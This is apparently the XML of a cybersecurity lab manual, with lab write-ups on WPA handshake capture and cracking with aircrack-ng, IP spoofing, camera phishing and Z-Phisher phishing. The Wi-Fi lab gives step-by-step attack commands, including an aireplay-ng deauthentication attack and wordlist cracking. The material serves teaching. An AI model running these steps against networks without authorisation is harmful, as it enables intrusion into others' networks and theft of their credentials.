        <w:t>iwconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E4562C4" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251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46EAF2B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3: Enable Monitor Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6F081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4971701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35A4C5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AFDE6D1" w14:textId="77777777" w:rsidR="005025F0" w:rsidRDefault="005025F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A30852B" w14:textId="140E7DD4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4: Scan Wireless Networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6271A659" w14:textId="77777777" w:rsidR="00F44251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Scan nearby networks:  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-ng wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D079B78" w14:textId="77777777" w:rsidR="00F44251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 the BSSID and channel of the target network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E41D16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53CD4AC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5: Capture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Packets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9B791B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Capture packets from target network:  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-ng --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>bssid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;BSSID&gt; -c &lt;CHANNEL&gt; -w capture wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125EF5E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Step 6: Perform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Deauthentication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Attack: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0C444E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Generate traffic to capture handshake: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>aireplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-ng --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>deauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5 -a &lt;BSSID&gt; wlan0mon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A556A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7: Crack Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFB0BBB" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:p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 wordlist to crack the captured handshake:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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 xml:space="preserve">-ng </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>capture.cap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFDD975" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="240"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OUTPUT :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="188C0CC9" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before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Nearby wireless networks displayed with BSSID and signal strength.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD34619" w14:textId="77777777" w:rsidR="00F44251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Packets captured successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77350711" w14:textId="77777777" w:rsidR="00F44251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 cracking attempted using wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485D1D26" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000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 found for weak passwords (if successful).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37340BF4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62BB5E9D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4929981C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5BBD334D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0465F59B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568BEC9C" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="280" w:line="360" w:lineRule="auto"/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the Wireless networks were successfully analyzed and audited using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>-ng tools. The experiment demonstrated how weak passwords and insecure configurations can be exploited, highlighting the importance of strong encryption and secure Wi-Fi practices.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58C957D1" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="6F35E0BE" w14:textId="1E50E391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49" w:name="_mven1lw82j81" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="49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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="00FBD93B" w14:textId="327889C2" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689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IP SPOOFING USING A GITHUB TOOL (EDUCATIONAL DEMONSTRATION)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C6689C" w14:paraId="082CC858" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F3ACD49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4DE23F16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B9B1976" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C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1A33FE3" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault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4026B3D" w14:textId="7E5C9A95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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To demonstrate IP spoofing techniques using an open-source GitHub tool in Kali Linux for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD8C89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understanding network-level attack concepts and security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06953DD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26728F9E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0" w:name="_osej9yqpdfuf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5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SOFTWARE REQUIREMENTS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FC5573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 Operating System: Windows / Linux / macOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5266E755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Virtualization Software: Oracle VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C57774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 Operating System: Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4284733C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Tool: John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E459352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Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E319869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RAM: Minimum 4 GB (8 GB recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB0FC70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Disk Space: Minimum 30 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D13E1C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Processor: Intel/AMD with Virtualization support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D48A7D1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075AC922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PROCEDURE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E2C66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6E298AA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Start Kali Linux Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E07888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Open Oracle VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120D638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Start Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B1277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Log in using Kali credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7544A546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585577A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Open Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779D6A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Launch Terminal in Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282BF39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Update system packages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392CF9E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apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7B7A58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551145A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3: Clone IP Spoofing Tool from GitHub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A90C2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Clone the repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4405C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git clone https://github.com/&amp;lt;username&amp;gt;/&amp;lt;ip-spoofing-tool&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E02A0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Navigate to the tool directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED7867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cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-spoofing-tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4E9B5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4: Install Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA01B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Install required dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7411A52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apt install python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F9757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pip3 install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741BA41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37365CA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5: Configure the Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D14E96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Open the script file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064AC0EE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nano spoof.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD819E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Configure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096618D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Target IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD3E83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Spoofed source IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5880665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Network interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E2E1B5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2AF9CF3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6: Execute IP Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C906C5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Run the tool with root privileges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B99383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python3 spoof.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200F9F4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Observe packet transmission with spoofed IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125E5132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475D9BF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7: Monitor Network Traffic (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D344FE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Use Wireshark or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AEA4B9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</w:p>
    <w:p w14:paraId="59622D9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Verify spoofed source IP packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267B652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6E54417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47210E8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6FF5300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C1FDBC0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Packets are sent with forged source IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3E29CB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Network traffic reflects spoofed IP information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D630CE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Demonstration successfully completed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181B236F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42B0F92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301415C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423540C9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10033B1C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6FF5DB6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DBB065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3AEE9DFB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F2F7B86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SCREEN SHOTS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA2BF9D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D9DAE4B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9ECCE78" wp14:editId="3CB9B85C">
            <wp:extent cx="5943600" cy="2628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45F4B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89763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BE26CA7" wp14:editId="786F043A">
            <wp:extent cx="5943600" cy="3271838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49452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8AE215" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="1A1026BC" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="560222CD" wp14:editId="2AFDE485">
            <wp:extent cx="5943600" cy="26797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AAB5F" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="467D5ABD" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="520EEEFC" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="21F309B9" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="03C8BF53" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="476080B5" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="5C368A60" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="336770EC" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="2263E4BA" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="6D4A88FC" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="5F762E72" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="53E0B1D7" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="6E136A8E" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="79EBC78A" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="6552E002" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="376895B4" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="4243E039" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="40FDCFA3" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="64136D64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58729D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1D058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129B9C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E868C4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0810C8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1578798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49DA5A8D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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Thus, the IP spoofing was successfully demonstrated using a GitHub-based tool in Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D0A365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experiment illustrates how attackers can manipulate IP headers and highlights the need</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE5E28A" w14:textId="55499B10" w:rsidR="00F44251" w:rsidRPr="00C6689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robust network security mechanisms.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2D971AEA" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="6295AE31" w14:textId="0616CE40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51" w:name="_7jwmiu9un7fu" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="51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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="23487401" w14:textId="5988946B" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689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STUDY OF CAMERA PHISHING USING OPEN-SOURCE GITHUB TOOL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C6689C" w14:paraId="72E17765" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18F0409A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3EB1342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C4EB778" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C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EAE40D2" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP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3999FF4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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To study the concept of camera phishing attacks using an open-source GitHub tool in Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A227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Linux in order to understand privacy threats and the importance of secure user awareness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F290C5E" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24CC4386" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B472932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2" w:name="_51f8m8mr3a6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5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SOFTWARE REQUIREMENTS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040441E1" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="325FF8A1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 Operating System: Windows / Linux / macOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D2128E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Virtualization Software: Oracle VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641E91CC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 Operating System: Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CC3281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Tool: John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBA27D9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Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F979762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RAM: Minimum 4 GB (8 GB recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3597657E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Disk Space: Minimum 30 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1D52EA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Processor: Intel/AMD with Virtualization support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C02A110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BE9DCA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PROCEDURE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C28D1F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3AC966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Start Kali Linux Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F120950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Open Oracle VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FC287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Start Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AA28D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Log in using Kali credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EE7DE1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35FE12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Study the Open-Source Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704E5D4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Access an open-source GitHub repository related to camera phishing (educational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095D562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purpose).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBE8BE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Review the documentation to understand:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1509FB2E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How fake permission prompts are created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF5DA85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How user interaction is exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CCECBF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Ethical limitations of such tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A3195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01073D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2394A1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3: Understand the Attack Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADC0A4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Analyze how phishing pages request camera permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668423C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Observe how browsers handle camera access requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765D9A9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Study how attackers misuse user trust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000154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1B3F93D0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4: Simulated Demonstration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7116510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Perform a local, consent-based simulation using test accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00305A1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Observe how camera permission prompts appear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FCA2EE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Analyze user response behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C03735B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B6D4BB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5: Analyze Security Implications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFD92C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Identify risks related to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF4AF1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Unauthorized camera access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EDD44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Privacy leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF4A5B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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Social</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0386511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Discuss how modern browsers and OS security attempt to mitigate such attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E1E9F9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FD9D0A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6: Study Prevention Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222625F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Browser permission management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8ADD9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awareness and training</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66634BBB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 and trusted domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5D446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OS-level camera access controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371562AE" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F442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778973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E0CB41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26B95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460D59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AB71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CFE50C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92D8F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9B8E18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A71872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18C33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C88F9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F8974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B90E8B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6FB773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6DD7F28" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F442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640D34" w14:textId="77777777" w:rsidR="00F4425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934982F" wp14:editId="21BF230F">
            <wp:extent cx="5857875" cy="2630649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r="64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630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B5E68" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F442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417F70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C2ECB7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CB0C413" wp14:editId="645EEDA2">
            <wp:extent cx="5629275" cy="2776538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l="2564" t="2641" r="2724" b="1780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76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FFA3A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F636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063D11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61814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AA55CB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AA1905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8ED192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0AB884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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The study of camera phishing using an open-source GitHub tool was successfully completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785557B2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Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E72A61B" w14:textId="1F5B26FD" w:rsidR="00C6689C" w:rsidRDefault="00C6689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1CD33B7B" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="397973E7" w14:textId="559AF0D1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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="036034B8" w14:textId="33ADCAA8" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="0090255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STUDY OF PHISHING ATTACKS USING Z-PHISHER (GITHUB TOOL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C6689C" w14:paraId="2FE740E3" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E9D9FD8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00A0A38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C36DDCA" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="0090255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5B10846" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP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8B0406B" w14:textId="70D596F8" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AIM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>To</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> study phishing attack concepts using the Z-Phisher open-source framework in Kali Linux in order to understand social-engineering threats, user behavior exploitation, and preventive security measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C804581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5CA420FC" w14:textId="47DB7606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SOFTWARE REQUIREMENTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9254C4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Host Operating System: Windows / Linux / macOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCAA849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Virtualization Software: Oracle VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A6E47E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Guest Operating System: Kali Linux</w:t>
      </w:r>
    </w:p>
